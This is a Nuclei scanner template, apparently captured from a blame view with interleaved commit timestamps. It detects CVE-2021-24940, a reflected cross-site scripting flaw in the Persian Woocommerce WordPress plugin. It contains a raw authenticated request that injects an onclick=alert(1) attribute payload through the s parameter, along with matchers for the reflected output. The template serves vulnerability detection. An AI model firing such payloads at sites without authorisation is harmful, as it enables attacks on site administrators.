2022-10-03 15:03:31 +00:00
id : CVE-2021-24940
info :
2022-10-05 15:12:55 +00:00
name : Persian Woocommerce < 5.9.8 - Cross-Site Scripting
2022-10-03 15:03:31 +00:00
author : daffainfo
severity : medium
2022-10-05 15:12:55 +00:00
description : |
The Persian Woocommerce WordPress plugin through 5.8.0 does not escape the s parameter before outputting it back in an attribute in the admin dashboard, which could lead to a Reflected Cross-Site Scripting issue
reference :
- https://wpscan.com/vulnerability/1980c5ca-447d-4875-b542-9212cc7ff77f
- https://nvd.nist.gov/vuln/detail/CVE-2021-24940
classification :
cve-id : CVE-2021-24940
2022-10-03 15:03:31 +00:00
metadata :
verified : true
2022-10-05 15:12:55 +00:00
tags : cve,cve2021,wordpress,wp-plugin,wp,xss,authenticated
2022-10-03 15:03:31 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-10-03 19:54:29 +00:00
2022-10-03 15:03:31 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1
Host : {{Hostname}}
2022-10-05 15:12:55 +00:00
req-condition : true
2022-10-03 15:03:31 +00:00
cookie-reuse : true
matchers :
2022-10-05 15:12:55 +00:00
- type : dsl
dsl :
- contains(all_headers_2, "text/html")
- status_code_2 == 200
- contains(body_2, 'accesskey=X onclick=alert(1) test=')
- contains(body_2, 'woocommerce_persian_translate')
2022-10-03 15:03:31 +00:00
condition : and
